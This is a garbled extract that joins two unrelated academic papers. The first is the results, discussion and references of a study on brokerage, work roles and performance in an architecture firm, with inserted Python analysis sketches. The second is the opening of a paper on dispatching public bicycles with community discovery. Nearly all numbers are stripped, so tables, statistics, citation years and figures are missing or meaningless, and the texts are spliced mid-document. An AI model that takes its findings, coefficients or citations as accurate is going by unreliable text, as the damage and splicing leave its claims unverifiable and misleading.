manager roles (n = ) were coded as interdependent ( ) and all individuals in professional architect roles (n = ) were coded as independent ( ). control variables we requested that the human resource manager of the company provide us with demographic data on the employees. from that data, we created the control variables for organizational tenure, gender, and education to be used in our models because they were found to be significant in earlier studies of network positions and various outcome variables (reagans and mcevily, ; reagans and zuckerman, ). language skills and age were also considered in evaluating the modeling strategy, but these variables did not increase the explanatory power of the models and were dropped. individuals were very homogeneous in terms of language skills, and age was highly correlated with tenure. there were six divisions in the firm specializing in certain types of architectural projects, for example, office buildings or shopping malls.
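a minimal sketch, on simulated data, of the tie-confirmation, network-combination, and brokerage steps described above; it uses networkx rather than ucinet or stata, the dichotomization threshold (the mean of the non-zero combined frequencies) is an assumption, and all matrices and names are illustrative only.

```python
import numpy as np
import networkx as nx

# hypothetical survey data: for each of the three question pairs, an (n x n)
# matrix of reported frequencies (0 = no tie), separately for the
# giving-information-to and getting-information-from components.
rng = np.random.default_rng(0)
n = 25
topics = ("design", "ideas", "development")
giving = {t: rng.integers(0, 5, size=(n, n)) for t in topics}
getting = {t: rng.integers(0, 5, size=(n, n)) for t in topics}

confirmed = {}
for t in topics:
    g, r = giving[t], getting[t]
    np.fill_diagonal(g, 0)
    np.fill_diagonal(r, 0)
    # keep the giving-to frequency only where the transposed getting-from
    # report confirms the tie
    confirmed[t] = np.where(r.T > 0, g, 0)

# sum the three networks, then dichotomize at the mean observed frequency
combined = sum(confirmed.values())
threshold = combined[combined > 0].mean()   # assumption: mean over non-zero entries
adj = (combined >= threshold).astype(int)

# undirected graph of confirmed ties
G = nx.from_numpy_array(np.maximum(adj, adj.T))

constraint = nx.constraint(G)                        # burt's constraint per node
brokerage = {v: -c for v, c in constraint.items()}   # additive inverse: higher = more brokerage
betweenness = nx.betweenness_centrality(G)
```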
we checked for an intraclass correlation (icc) between the units to determine whether unit affiliation is a considerable source of variance in performance and did not find justification for hierarchical models. results table presents bivariate correlations and descriptive statistics of the variables. dependent variables and work role are numbered to , followed by control variables and brokerage measures. we found table . means, standard deviations, and correlations. variable mean sd billable hours . . promoting new ideas . . − . ** independent work role . . . * − . ** tenure . . − . . − . ** female . . . − . . − . master’s degree . . − . . − . ** . − . inverse of burt’s constraint . . − . . ** − . ** . * − . ** . betweenness centrality . . − . ** . ** − . * . − . * . . ** notes: *p < . ; **p < . . connections a positive correlation between both brokerage measures and idea promotion. the number of billable hours negative correlation is significant with betweenness centrality, but not with the inverse of burt’s constraint. the independent role (i.e. = independent, = interdependent) correlates positively with the number of billable hours and negatively with idea promotion, which supports the assumption of distinct output expectations between the work roles. having a master’s degree and tenure correlate negatively with independent work role, indicating that those in interdependent work roles have higher education and higher tenure than independent roles. both brokerage measures are positively intercorrelated as expected. we z-standardized all independent variables to facilitate better interpretation of the moderation effect as suggested by dawson ( ). tables and present the results of the regression analyses testing the association between the inverse of burt’s constraint, betweenness centrality, promoting new ideas, and billable hours. as postestimation of the models showed heteroscedasticity of the residuals caused by slight non-normality of the transformed dependent variables, we used robust standard errors to control for this, as suggested by antonakis and dietz ( ). ols regression was chosen because it has been considered a valid modeling strategy when network measures are included as independent variables (e.g. reagans and mcevily, ; srivastava, ). however, the network measures violate the independence of observations, which is one of the key assumptions of ols regression resulting as underestimating of standard errors and over-rejecting of hypotheses (srivastava, ). to correct this, we chose a procedure suggested by borgatti et al. ( ) and compared the results of our conventional ols models with those obtained from ucinet vi node- level regression, which uses the ols regression to generate the coefficients, but permutation technique for the p-values. as both modeling techniques are presented side by side in tables and , it can be observed that the permutation technique generally results in higher t-values for those coefficients that are statistically significant, providing additional support for our results. our hypothesis about the work role’s boundary effect on brokerage means that brokerage is associated with higher work role-prescribed per- formance, if the role is interdependent. in other words, as employees in interdependent work roles are expected to engage in promoting new ideas in the organization, they benefit from brokerage. to test this aspect of the hypothesis, we first examined the table . 
results of conventional and node-level ols regression analysis for promoting new ideas (t-values in parentheses). promoting new ideas model conventional ols model permutation ols model conventional ols model permutation ols independent work role − . (− . ) − . (− . ) − . (− . )** − . (− . )** tenure . ( . ) . ( . ) . ( . ) . ( . ) female . ( . ) . ( . ) . ( . ) . ( . ) master’s degree . ( . ) . ( . ) . ( . ) . ( . ) inverse of burt’s constraint . ( . )** . ( . )** independent × inv. of burt’s constraint − . (− . )** − . (− . )** betweenness centrality . ( . )** . ( . )** independent × betweenness − . (− . ) − . (− . ) constant . ( . )** . (na) . ( . )** . (na) r . . . . n note: **p < . . the contingent effect of work roles on brokerage in professional organizations table . results of ols and node-level regression analysis for billable hours (t-values in parentheses). billable hours model conventional ols model permutation ols model conventional ols model permutation ols independent work role . ( . ) . ( . ) . ( . )* . ( . )* tenure . ( . ) . ( . ) . ( . ) . ( . ) female . ( . ) . ( . ) . ( . ) . ( . ) master’s degree . ( . ) . ( . ) . ( . ) . ( . ) inverse of burt’s constraint − . (− . )* − . (− . )* independent × inv. of burt’s constraint . ( . )** . ( . )* betweenness centrality − . (− . ) − . (− . ) independent × betweenness . ( . ) . ( . ) constant − . (− . ) − . (na) − . (− . ) − . (na) r . . . . n notes: *p < . ; **p < . . main effects of the inverse of burt’s constraint and betweenness centrality and then their interactions with independent versus interdependent work role. according to the main effects of the brokerage measures in models to in table , brokerage is associated with higher scores for promoting new ideas. when examining the significant interaction effect of the work role in the models and in table , it is evident that employees in interdependent roles benefit from brokerage more than those in independent roles for promoting new ideas. for example in models and , the positive effect of the inverse of burt’s constraint for interdependent work roles is . and for independent work roles, the effect is . − . = . . further, according to our hypothesis, for inde- pendent work roles, brokerage should have less effect on role-prescribed performance than for interdependent roles. in table , brokerage is modeled with billable hours, which is the role-prescribed performance measure for independent work roles. the main effects of models and in table indicate that brokerage is negatively associated with billable hours. the interaction effect of the work role in model shows that the negative effect of the inverse of burt’s constraint for interdependent work roles is − . and for independent work roles, the effect is − . − . = − . . this shows that higher brokerage is associated with lower role-prescribed performance for independent roles. according to the main effects of the models presented in tables and , brokerage seems to be associated with higher performance in idea promotion and lower performance in billable hours, despite work role. however, in order to distinguish the work role-specific effects, further examination is needed. for this purpose, we examined the interactions by studying the simple slopes, which is a procedure in probing the interaction patterns (dawson, ). 
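before turning to the simple slopes, the following sketch shows, on simulated data with hypothetical variable names, the kind of moderated regression with robust standard errors and the permutation-based p-values used as a check on these models; it is not the authors' estimation code (they report conventional ols and ucinet node-level regression).

```python
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

# simulated stand-in data; variable names mirror the text but values are random.
rng = np.random.default_rng(1)
n = 42
df = pd.DataFrame({
    "promote_ideas": rng.poisson(2, n) ** 0.5,   # sqrt-transformed nomination counts
    "independent": rng.integers(0, 2, n),
    "tenure": rng.normal(8, 4, n),
    "female": rng.integers(0, 2, n),
    "masters": rng.integers(0, 2, n),
    "brokerage": rng.normal(0, 1, n),            # z-standardized inverse of burt's constraint
})

formula = ("promote_ideas ~ independent + tenure + female + masters"
           " + brokerage + independent:brokerage")
ols = smf.ols(formula, data=df).fit(cov_type="HC3")  # heteroscedasticity-robust standard errors
print(ols.summary())

# permutation test in the spirit of node-level regression: shuffle the dependent
# variable, refit, and compare the observed coefficient with the permutation distribution.
observed = ols.params["independent:brokerage"]
perm = []
for _ in range(1000):
    shuffled = df.assign(promote_ideas=rng.permutation(df["promote_ideas"].values))
    perm.append(smf.ols(formula, data=shuffled).fit().params["independent:brokerage"])
p_perm = (np.sum(np.abs(perm) >= abs(observed)) + 1) / (len(perm) + 1)
print("permutation p-value for the interaction:", p_perm)
```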
after generating the significances of the simple slopes for interactions of the models with the inverse of burt’s constraint and betweenness centrality for both promoting new ideas and billable hours (models , , , and in tables and ) with stata’s “margins” procedure (table a ), we confirmed the hypothesis. for promoting new ideas, the coefficients of the simple slopes were statistically significant and positive for interdependent roles with both brokerage measures. betweenness centrality was positive and significant also for independent roles, suggesting that brokerage is also associated with independent professionals in promoting their ideas. this was the case for the independent professionals in our study connections who were not expected to promote new ideas, which was evident because professionals out of received zero nominations as promoters of new ideas. notably, for interdependent roles, brokerage is associated with lower number of billable hours. discussion our study adds knowledge on the relation of brokerage to performance and improves the empirical understanding of how formal organization is related to the informal. in our case organization, our finding is that brokerage is associated with higher role- prescribed performance for those in interdependent roles, but not for those in independent roles. therefore, our findings show that work role is a contingency, a boundary condition for brokerage. as brokers are bridging structurally distinct groups (adler and kwon, ; burt, , ; reagans and mcevily, ), brokerage correlates with managerial performance in our empirical setting but does not have an association with independent professional’s performance measured with the amount of billable hours. theoretical contributions by presenting work role as a boundary condition for brokerage, this paper makes several contributions to theory. first, the study complements earlier studies on the interplay of formal and informal organization (biancani et al., ; kleinbaum et al., ; soda and zaheer, ; srivastava, ). our results show that formal and informal structures reinforce each other, as proposed by mcevily et al. ( ) as one interaction mechanism between the formal and informal structures. second, the study complements the contingency perspective on network theory. the network theory’s structuralist argument suggests a direct causal link from brokerage to performance (e.g. emirbayer and goodwin, ; mayhew, ), traditionally giving less attention to contingencies. this has probably led to underrepresentation of network studies taking moderators such as work roles into account, only with few exceptions (ahuja et al., ; brass, ; burt, ; ibarra and andrews, ), and only quite recently, the individual attributes as contingencies have been consistently included in network studies (landis, ). therefore, this study contributes to most brokerage literature that seems to imply that brokerage position benefits the broker, and sometimes but not always the network, all the time under all circumstances. our study provides empirical evidence that suggests that it is in the role of managers to broker relations and communication among the horizontally and vertically differentiated units and employees for which they have responsibility. our study suggests that formal work role not only greatly influences the performance targets, but also limits the advantage of brokerage to the behavior prescribed by the work role only for interdependent work roles. the strength of our study is in its organization- wide approach. 
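a self-contained sketch, again on simulated data with hypothetical names, of how the simple slopes and their standard errors can be probed as linear combinations of the fitted coefficients, approximating what stata's margins procedure reports.

```python
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

# simulated data, only to show the mechanics of probing the interaction
rng = np.random.default_rng(2)
n = 42
df = pd.DataFrame({
    "dv": rng.normal(size=n),
    "independent": rng.integers(0, 2, n),
    "brokerage": rng.normal(size=n),
})
fit = smf.ols("dv ~ independent * brokerage", data=df).fit(cov_type="HC3")

# simple slope of brokerage within each role, as a linear combination of coefficients:
#   interdependent roles (independent = 0): b_brokerage
#   independent roles    (independent = 1): b_brokerage + b_interaction
names = list(fit.params.index)
interdep = np.zeros(len(names))
interdep[names.index("brokerage")] = 1.0
indep = interdep.copy()
indep[names.index("independent:brokerage")] = 1.0

print(fit.t_test(interdep))  # slope and delta-method se for interdependent roles
print(fit.t_test(indep))     # slope and delta-method se for independent roles
```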
we obtained network data from the entire population of employees in the firm with a particularly detailed survey questionnaire backed up with qualitative interviews. we separately surveyed giving-and-getting types of informal work-related communication ties enabling improved accuracy in examining brokerage. this so-called whole-network approach increases the validity of the brokerage measures used in the models (borgatti et al., ). the second strength of our study is that it measured the role-prescribed performance with objective performance data: independent work role’s performance with billable hours from the time sheets and interdependent role’s performance with peer evaluations of idea promotion. by doing so, we complement the studies that have connected organization-wide networks and work performance (brass, ; carboni and ehrlich, ; cross and cummings, ; mehra et al., ; sparrowe et al., ). limitations and future research despite its contributions, this study has several limitations providing motivation for further research. the first one concerns the case study character of our study. our data were gathered from one firm, which limits the generalizability of the results. yet, we were able to collect detailed survey, timesheet, and demographic data about the individuals working in the firm, resulting in organization-wide, bounded network data with the dependent variables that were meaningful proxies for performance. confirming with the interviews and reviewing the self-reported job descriptions of professionals and supervisors, we concluded that the architect office seems like so many professional organizations, where work requires both high talent and extensive training, and where managers have professional backgrounds. the architects are regulated by a national regulatory agency with certification exams, and most of the individuals we studied were certified architects, thus the professional’s work in the firm was similar compared to firms in the same industry. the firm was well established in its market, and the employee the contingent effect of work roles on brokerage in professional organizations turnover was relatively low providing prerequisites for established communication network structures and divisions of labor between the work roles. the second limitation is the reverse causality caused by common method variance, which is the usual limitation discussed in survey-based network studies (e.g. carboni and ehrlich, ; sparrowe et al., ). we addressed common method variance by constructing our network variables from the first year of study and used the dependent variables from the second year. according to the assumptions of the structuralist approach of network theory, we assumed the causality of brokerage predicting performance in our research design. our approach speaks to this causality, but as the communication network structures may take time to develop and become rigid, we are still left with a concern of reverse causality in which performance leads to structural advantage to some extent. this may be the case with the employees in interdependent roles, since brokerage was, as expected, associated with a higher idea promoter score, and promoters have a tendency to become central individuals (obstfeld, ; scott, ), making our idea promoter dv actually a measure of prestige. nevertheless, becoming prestigious in a professional organization arguably requires brokerage between others, so we are certain to have captured the right phenomenon with our measure of idea promotion. 
the third limitation is related to alternative explanations on the mechanisms of why the nature of work role moderates brokerage. our argumentation developed around thompson’s ( ) idea of more independent roles (e.g. professional architects in our case) requiring less collaboration and coordination, thus benefiting less from brokerage is in line with previous research. however, differences in legitimacy between professional architects and managers would provide an alternative explanation for our hypothesis in our data. for example, burt ( ) shows that women do not benefit from brokerage unless they have a more senior mentor as a sponsor, and argues that this effect is common for all low-status individuals in an organization (burt and merluzzi, ). high-status versus low- status distinction is not entirely unrelated to the interdependent–independent distinction in our paper as the managers, on average, in our case firm have higher tenure and education levels than professional architects. however, nothing in our interviews and discussions in the company signaled to us about a possible legitimacy problem in the company. the fourth limitation is related to our performance measures. billable hours as a measure of pro fessional’s performance is uniform across all indi viduals, but the idea promotion score merits further examination. superior evaluations have been the most commonly used across previous network studies, despite variation across superiors (teigland and wasko, ). our peer evaluation method’s strongpoint is that it rules out the variance between different supervisors evaluating their subordinates. we considered peer evaluation meaningful, because the size of the firm was rather small, and everyone knew each other since they shared the same open office space. future research could extend the findings of this paper in numerous directions. one direction comes from the contribution of this paper suggesting the independent–interdependent work role as a boundary condition for brokerage. as brokerage theory has been applied to a wide range of work contexts, which might be argued to vary in terms of interdependence, the interdependence aspect has not been at the core of their research design implying that it should be equally well applicable to both. moreover, most of the empirical evidence of benefits of brokerage up until now has been done exclusively with managers, therefore coming from the work that is fundamentally interdependent (e.g. chain managers or investment bankers). further research would be needed to complement brokerage theory with work role point of view to clarify this specific boundary condition. further research could also investigate more how status differences and legitimacy issues between individuals act as boundary conditions. for theorizing this stream of research, brokerage theory could benefit from hypotheses of status differences coming from evolutionary psychology and behavioral economics. management theory’s formal–informal aspects present another future research direction. an innovative approach would be to study the co- existence and effectiveness of formal and informal structures with operationalizing formal structures not only as role hierarchies but also as workflow networks derived from project data and control for clearly work-related communication between superiors and employees. as most professional organizations are not as stratified as architectural firms, participating in the same project would serve as a proxy for formal structure. 
novel data gathering methods about informal social structure could also be used. since work-related communication is increasingly taking place digitally, communication data can be gathered from databases in addition to self-administered surveys. by analyzing the content of communication by text mining; for example, examining the content of e-mails individuals send each other, and dividing the content between formal and informal communication, would shed light on a multiplicity of relationships, connections efficiency and innovativeness on a large scale, and answer the question as to how these network structures are associated with each other. managerial implications in addition to the theoretical contributions, our study has implications for managers of professional organizations. according to the extant understanding in the managerial practice, successful organizations are both highly efficient in what they do and capable of adapting to changes. typically, in professional organizations, professionals work primarily on tasks requiring specialized skills and competence, and managers work primarily in project management, sales, and offering development. executives of professional organizations, at least in the most artistically and intellectually demanding kind, such as architecture, should therefore proceed with caution with the ideas of flattening formal hierarchies and divisions of labor in their organizations, in order to sustain simultaneous managerial capacity and professional performance. the finding that brokerage affords limited advantage to independent professionals suggests that, contrary to common belief, such people maybe should not invest a great deal of their time in networking and bridge building if that is not what their professional roles require. an informal organization in a professional organization can thus be seen as a mixture of independent professionals and interdependent managers. a successful firm balancing efficiency and adaptation is one that provides room for both independent and interdependent work roles and considers that not everyone should behave as brokers. conclusion in this paper, we examined how work role moderates the advantages of brokerage for role-prescribed performance. our findings suggest that the advantage is contingent upon the work role and brokerage facilitates role-prescribed performance for individuals in interdependent roles but not for those in independent roles. references adler, p. and kwon, s.-w. . “social capital: the good, the bad, and the ugly”, in lesser, e. (ed.), know­ ledge and social capital. foundations and applications. butterworth-heineman, boston, ma, pp. – . adler, p. s. and kwon, s.-w. w. . social capital: prospects for a new concept. academy of management review : – . ahuja, m. k., galletta, d. f. and carley, k. m. . individual centrality and performance in virtual r&d groups: an empirical study. management science : – . amabile, t. m. . creativity in context, vol. xviii boulder, co, pp. antonakis, j. and dietz, j. . looking for validity or testing it? the perils of stepwise regression, extreme- scores analysis, heteroscedasticity, and measurement error. personality and individual differences : – . aral, s. and van alstyne, m. . the diversity- bandwidth trade-off. american journal of sociology : – . bachrach, d. g., powell, b. c., collins, b. j. and richey, r. g. . effects of task interdependence on the relationship between helping behavior and group per- formance. journal of applied psychology : – . 
barnes, m., kalberg, k., pan, m. and leung, p. . when is brokerage negatively associated with economic benefits? ethnic diversity, competition, and common-pool resources. social networks : – . biancani, s., mcfarland, d. a. and dahlander, l. . the semiformal organization. organization science : – . biddle, b. . recent developments in role theory. annual review of sociology : – . borgatti, s. p., everett, m. g. and johnson, j. c. . analyzing social networks, sage, london. brass, d. j. . structural relationships, job charac- teristics, and worker satisfaction and per formance. administrative science quarterly : – . burt, r. s. . structural holes: the social structure of competition, vol. , harvard university press, cambridge ma, available at: http://books. google.com/books?id=e v cvy hvic burt, r. s. . the contingent value of social capital. administrative science quarterly : – . burt, r. s. . the gender of social capital. rationality and society : – . burt, r. s. . structural holes and good ideas. american journal of sociology : – . burt, r. s. and merluzzi, j. . embedded brokerage: hubs versus locals. research in the sociology of organizations : – . carboni, i. and ehrlich, k. . the effect of relational and team characteristics on individual performance: a social network perspective. human resource management : – . carnabuci, g. and oszegi, d. i. . social networks, cognitive style, and innovative performance: a contingency perspective. academy of management journal : – . cross, r. and cummings, j. n. . tie and network correlates of individual performance in the contingent effect of work roles on brokerage in professional organizations knowledge-intensive work. academy of management journal : – . cummings, t. g. . self-regulating work groups: a socio-technical synthesis. academy of management review : – . dawson, j. f. . moderation in management research: what, why, when, and how. journal of business and psychology : – . emirbayer, m. and goodwin, j. . network analysis , culture, and the problem of agency. american journal of sociology : – . etzioni, a. . modern organizations prentice- hall, englewood cliffs, nj. fang, r., landis, b., zhang, z., anderson, m. h., shaw, j. d. and kilduff, m. . outcomes in organizations integrating personality and social networks: a meta-analysis of personality, network position, and work outcomes in organizations. organization science : – . fleming, l., mingo, s. and chen, d. . collaborative brokerage, generative creativity, and creative success. administrative science quarterly : – . freeman, l. c. . a set of measures of centrality based on betweenness. sociometry : – . granovetter, m. s. . the strength of weak ties. american journal of sociology : – . griffin, m. a., neal, a. and parker, s. k. . a new model of work role performance: positive behavior in uncertain and interdependent contexts. academy of management journal : – . hansen, m. t. . the search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. administrative science quarterly : – . hansen, m. t. and haas, m. r. . competing for attention in knowledge markets: electronic document dissemination in a management consulting company. administrative science quarterly : – . ibarra, h. and andrews, s. b. . power, social influence, and sense making: effects of network centrality and proximity on employee perceptions. administrative science quarterly : – . katz, d. and kahn, r. l. . the social psychology of organizations nd ed., wiley, new york, ny. kleinbaum, a. 
m., stuart, t. e. and tushman, m. l. . discretion within constraint: homophily and structure in a formal organization. organization science : – . krackhardt, d. . assessing the political landscape: structure, cognition, and power in organizations. admini­ strative science quarterly : – . krackhardt, d. j. . “graph theoretical dimensions of informal organizations”, in carley, k. m. and prietula, m. j. (eds), computational organization theory, l. erlbaum associates, hillsdale, nj, pp. xvii, pp. landis, b. . personality and social networks in organizations: a review and future directions. journal of organizational behavior : s –s . langfred, c. w. . work-group design and autonomy: a field study of the interaction between task interdependence and group autonomy. small group research : – . langfred, c. w. . autonomy and performance in teams: the multilevel moderating effect of task interdependence. journal of management : – . leroy, h., anseel, f., gardner, w. l. and sels, l. . authentic leadership, authentic followership, basic need satisfaction, and work role performance: a cross- level study. journal of management : – . lincoln, j. r. . social structures: a network approach. administrative science quarterly : – . lincoln, j. r. and miller, j. . work and friendship ties in organizations: a comparative analysis of relational networks. administrative science quarterly : – . march, j. g. . exploration and exploitation in organizational learning. organization science : – . marsden, p. ( ), “survey methods for network data”, in scott, j. and carrington, p. j. (eds), the sage handbook of social network analysis, sage publications, london, pp. – . mayhew, b. h. . structuralism versus indi- vidualism: part , shadowboxing in the dark. social forces : – . mcevily, b., soda, g. and tortoriello, m. . more formally: rediscovering the missing link between formal organization and informal social structure. the academy of management annals : – . mehra, a., kilduff, m. and brass, d. j. . the social networks of high and low self-monitors: implications for workplace performance. administrative science quarterly : – . merton, r. . bureaucratic structure and personality. social forces : – . obstfeld, d. . social networks, the tertius iungens orientation, and involvement in innovation. administrative science quarterly : – . padgett, j. f. and ansell, c. k. . robust action and the rise of the medici, - . american journal of sociology : – . pfeffer, j. and salancik, g. r. . determinants of supervisory behavior: a role set analysis. human relations : – . reagans, r. and mcevily, b. . network structure and knowledge transfer: the effects of cohesion and range. administrative science quarterly : – . reagans, r. and mcevily, b. . contradictory or compatible? reconsidering the “trade-off” between brokerage and closure on knowledge sharing. network strategy : – . reagans, r. and zuckerman, e. w. . networks, diversity, and productivity: the social capital of corporate r&d teams. organization science : – . saavedra, r., earley, p. c. and van dyne, l. . complex interdependence in task-performing groups. journal of applied psychology : – . connections scott, j. . social network analysis: a handbook nd ed, sage publications, london. soda, g. and zaheer, a. . a network perspective on organizational architecture: performance effects of the interplay of formal and informal organization. strategic management journal : – . soda, g., stea, d. and pedersen, t. . network structure, collaborative context, and individual creativity. 
journal of management : – . sparrowe, r. t., liden, r. c., wayne, s. j. and kraimer, m. l. . social networks and the performance of individuals and groups. academy of management journal : – . srivastava, s. b. . intraorganizational network dynamics in times of ambiguity. organization science : – . stajkovic, a. d., lee, d. and nyberg, a. j. . collective efficacy, group potency, and group perfor- mance: meta-analyses of their relationships, and test of a mediation model. journal of applied psychology : – . teigland, r. and wasko, m. . knowledge transfer in mncs: examining how intrinsic motivations and knowledge sourcing impact individual centrality and performance. journal of international management : – . thompson, j. d. . organizations in action mcgraw-hill, new york, ny. tuominen, t. . innovation and development ac- tivities in professional service firms – a role structure per- spective, aalto university publication series doctoral dissertations. wang, j., cheng, g. h., chen, t. and leung, k. . team creativity/innovation in culturally diverse teams: a meta-analysis. journal of organizational behavior : – . wasserman, s. and faust, k. . social network analysis: methods and applications. cambridge university press. new york, ny. weber, m. . “bureaucracy”, in grusky, o. and miller, g. (eds), complex organizations, free press, new york, ny, pp. – . welbourne, t. m., johnson, d. e. and erez, a. . the role-based performance scale: validity analysis of a theory-based measure. academy of management journal : – . table a . simple slopes of the models , , , and . delta method dy/dx se z p > |z| [ % conf. interval] promoting new ideas inv. of burt’s constraint independent work role . . . . . . . . − . . betweenness centrality independent work role . . . . . . . . . . . . billable hours inv. of burt’s constraint independent work role − . . − . . − . − . . . . . − . . betweenness centrality independent work role − . . − . . − . . . . . . − . . note: statistically significant slopes italicized. appendix submitted march accepted september published october corresponding author yang yang, @hdu.edu.cn, yangyang_hdu@ .com academic editor xiangjie kong additional information and declarations can be found on page doi . /peerj-cs. copyright lin et al. distributed under creative commons cc-by . open access urban public bicycle dispatching optimization method fei lin , yang yang , , shihua wang , yudi xu , hong ma and ritai yu school of computer science and technology, hangzhou dianzi university, hangzhou, china current affiliation: institute of intelligent media technology, communication university of zhejiang, hangzhou, china abstract unreasonable public bicycle dispatching area division seriously affects the operational efficiency of the public bicycle system. to solve this problem, this paper innovatively proposes an improved community discovery algorithm based on multi-objective optimization (cdomo). the data set is preprocessed into a lease/return relationship, thereby it calculated a similarity matrix, and the community discovery algorithm fast unfolding is executed on the matrix to obtain a scheduling scheme. for the results obtained by the algorithm, the workload indicators (scheduled distance, number of sites, and number of scheduling bicycles) should be adjusted to maximize the overall benefits, and the entire process is continuously optimized by a multi-objective optimization algorithm nsga . 
the experimental results show that compared with the clustering algorithm and the community discovery algorithm, the method can shorten the estimated scheduling distance by %– % and can effectively balance the scheduling workload of each area. the method can provide theoretical support for the public bicycle dispatching department and improve the efficiency of the public bicycle dispatching system. subjects data mining and machine learning, software engineering keywords multi-objective optimization, public bicycle system, community discovery algorithm, regional scheduling workload, elite strategy introduction with the progress of urbanization, people's awareness of low-carbon living and health is increasing. the public bicycle system provides a green and healthy way to travel and has gradually become an important part of the public transport system. however, the study of the division of public bicycle dispatching areas is still at a preliminary stage. the division of the public bicycle scheduling area has two purposes: decomposing the scheduling between large-scale sites, and reducing the computational complexity of path planning. at present, the mainstream regional division method is based on the urban administrative area, with each administrative area treated as an independent scheduling area. however, the boundaries of residents' travel are not as clear as the administrative boundaries, and with the development of the city the links between areas become ever closer, so a division based on urban administrative areas lacks a scientific basis. tulabandhula & bodas ( ) proposed a passenger monitoring system for dispatching vehicles in a public transportation network; the system monitors passengers at the station, vehicle scheduling information, and the associated hardware equipment. because the size and population density of each administrative area are different, the number of sites in each area varies greatly. pan, jun-yi & min ( ) designed a heuristic simulated annealing hybrid search algorithm for large-scale distributed vrp problems: first, a mathematical model is established based on the actual gis road network; second, the large-scale vrp path planning problem is studied. the administrative area is large in size and concentrated in population. forma, raviv & tzur ( ) consider the spatial nature of public bicycle rentals and the initial bicycle inventory; the paper then establishes a regional maximum-diameter distance constraint model, and finally the best classification results are obtained by heuristic algorithms that minimize the overall inventory cost. therefore, where there are more sites, public bicycle turnover is high and the dispatching workload is large, but where there are fewer sites, public bicycle turnover is low and the dispatching workload is small. above all, the lack of a scientific planning method often leads to higher scheduling capital costs.
schuijbroek, hampshire & hoeve ( ) applied the maximum algebra algorithm to the division of the public bicycle scheduling area, and the paper established the corresponding partition mathematical model. the goal of zoning is to minimize the maximum completion time based on a reasonable level of service. aiming at the problems, this paper proposes an improved community discovery algorithm based on multi-objective optimization. by using this innovative algorithm, the results show that the algorithm brings three major benefits: it can effectively shorten the public bicycle scheduling distance, improve the scheduling efficiency, and effectively balance the workload of regional scheduling. related work the division of the public bicycle dispatching area involves operational research, and researchers have made significant contribution. public bicycles and buses, as well as cargo transport vehicles are public transport, and their operations have similarities. therefore, they can learn dispatching methods from each other. kloimllner (miranda-bront et al., ) decomposes the problem of public bicycles into two sub-problems: scheduling area partitioning and scheduling path planning. then create an integer programming model to achieve as few bicycle rental points as possible. in addition, other researchers chose to use clustering algorithms. phanikrishnakishore & madamsetti ( ) used the rental rules between public bicycle stations, the space of public bicycle stations, and the non-spatial attributes of public bicycle stations, as well as the self-flow characteristics, using association rules to classify sites with strong correlation into the same category. finally, various types of site space enclosed areas serve as the scheduling area for public bicycles. zhang, liang & wei ( ) proposed a public bicycle scheduling area division scheme based on the improved k-means clustering algorithm. in the data analysis, the algorithm effectively estimates the k central sites at the initial central site. after the k-means clustering algorithm is divided, the edge sites are clustered and lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adjusted again according to the scheduling requirements. xu, qin & ma ( ) integrates the spatial relationship between the sites, and the lease relationship of the bicycle, establishes the similarity matrix of the site, and proposes the parameters of the regional coupling, quantifies the degree of connection between the regions, and finally uses the clustering algorithm to obtain the corresponding result. long, szeto & huang ( ) established a dynamic regional scheduling model, for large-scale public bicycle scheduling problems, and proposed a multi-stage re-optimized dynamic clustering algorithm, integrates optimal division, task balance between regions and regions. within the balance of demand, three factors are progressively clustered, and in the process of solving, the abnormal sites are continuously split to gradually improve the clustering results. dziauddin, powe & alvanides ( ) has studied the public bicycle dispatching area, found that there are often abnormal sites in the division, and he proposed a k-center algorithm, adaptively limits the capacity of the rental site. 
hartmann tolić, martinović & crnjac milić ( ) analyzed the spatial attributes and community structure of public bicycles; using a community discovery algorithm, the paper analyzed the community structure of the public bicycle networks of washington, london and boston and verified that community structure does exist in public bicycle networks. the main approaches to scheduling area division are model-based methods (dubey & borkar, ) and clustering algorithms (sun, zhang & du, ). model-based methods require an abstract formulation, involve many constraints, and are not easy to solve; for clustering algorithms, it is difficult to determine the number of clusters and to evaluate the result. moreover, neither approach provides evaluation criteria for the scheduling workload or considers whether the workload is balanced. therefore, this paper proposes a new method to solve the problem.

scheduling area division model design
this part establishes the division model of the public bicycle scheduling area, including the description of the model, the assumptions of some conditions, and the interpretation of the parameters. finally, this section proposes a lease/return point demand forecasting model; the data obtained from this model are used to verify whether cdomo's estimated total dispatch distance is the shortest.

problem description
at present, clustering algorithms are mainly used to solve the problem of scheduling area division. the data set, abbreviated ds, is preprocessed with a data preprocessing program into a lease/return relationship, abbreviated lrr, between sites. then, through the similarity calculation between the sites, the similarity matrix, abbreviated sm, is generated (yanping, decai & duoning, ). in the conversion from ds to sm below, $r_{ij}$ denotes the similarity between site $i$ and site $j$, $q_{ij}$ the number of bicycles rented at site $i$ and returned at site $j$, and $q_{ji}$ the number of bicycles rented at site $j$ and returned at site $i$:

$$\mathrm{DS}\ \xrightarrow{\ C_1\ }\ \mathrm{LRR}=\Big([q_{ij}],\,[q_{ji}]\Big)\ \xrightarrow{\ C_2\ }\ \mathrm{SM}=[r_{ij}]$$

the conversion $C_1$ is the data preprocessing program, and the conversion $C_2$ computes each similarity over a time range of $m$ days:

$$r_{ij}=\frac{q_{ij}+q_{ji}}{m}$$

finally, a clustering algorithm, abbreviated ca, divides the similarity matrix into the division result dr, a set of $n$ independent scheduling areas:

$$\mathrm{SM}\ \xrightarrow{\ CA\ }\ \mathrm{DR}=\{R_1,R_2,\ldots,R_n\}$$

a short illustrative sketch of this conversion is given below.
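the following sketch is a minimal illustration of the ds-to-sm conversion, assuming pandas is available and using the start/end station id fields that the dataset description lists later in the paper; it is not the authors' implementation.

```python
# Illustrative sketch of the DS -> LRR -> SM conversion described above.
# Column names follow the trip-record fields mentioned later in the paper;
# m_days is the length of the observation window in days.
import pandas as pd

def similarity_matrix(trips: pd.DataFrame, m_days: int) -> pd.DataFrame:
    """Build the symmetric site similarity matrix r_ij = (q_ij + q_ji) / m."""
    # q_ij: trips rented at site i (rows) and returned at site j (columns)
    q = (trips.groupby(["start_station_id", "end_station_id"])
              .size()
              .unstack(fill_value=0))
    sites = q.index.union(q.columns)                      # align rows and columns
    q = q.reindex(index=sites, columns=sites, fill_value=0)
    return (q + q.T) / m_days

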